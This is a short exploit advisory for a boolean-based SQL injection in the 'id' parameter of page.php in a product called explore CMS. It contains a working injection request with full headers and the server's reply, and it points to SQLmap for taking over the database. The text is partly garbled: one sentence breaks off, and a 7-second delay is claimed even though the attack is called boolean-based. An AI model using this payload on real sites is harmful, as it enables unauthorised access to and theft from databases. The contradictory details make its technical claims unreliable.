# Exploit Title: explore CMS - Boolean Based SQL Injection  
# Date: 19/03/2022  
# Exploit Author: Sajibe Kanti  
# Vendor Name : EXPLORE IT  
# Vendor Homepage:  
# CVE: On Request  
# POC  
#SQL Injection  
SQL injection is a web security vulnerability that allows an attacker  
to interfere with the queries that an application makes to its  
explore CMS is vulnerable to the SQL Injection in 'id' parameter of  
the 'page' page.  
#Steps to reproduce  
Following URL is vulnerable to SQL Injection in the 'id' field.  
GET /page.php?id=1%27%20OR%201%3d1%20OR%20%27ns%27%3d%27ns HTTP/1.1  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-us,en;q=0.5  
Cache-Control: no-cache  
Cookie: PHPSESSID=b4c39f2ff3b9470f39bc088ab9ba9320  
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36  
HTTP/1.1 200 OK  
server: LiteSpeed  
Connection: Keep-Alive  
Keep-Alive: timeout=5, max=100  
content-type: text/html; charset=UTF-8  
transfer-encoding: chunked  
date: Thu, 17 Mar 2022 07:27:21 GMT  
vary: Accept-Encoding  
Server accepts the payload and the response get delayed by 7 seconds.  
An attcker can compromise the database of the application by manual  
method or by automated tools such as SQLmap.  
Sajibe Kanti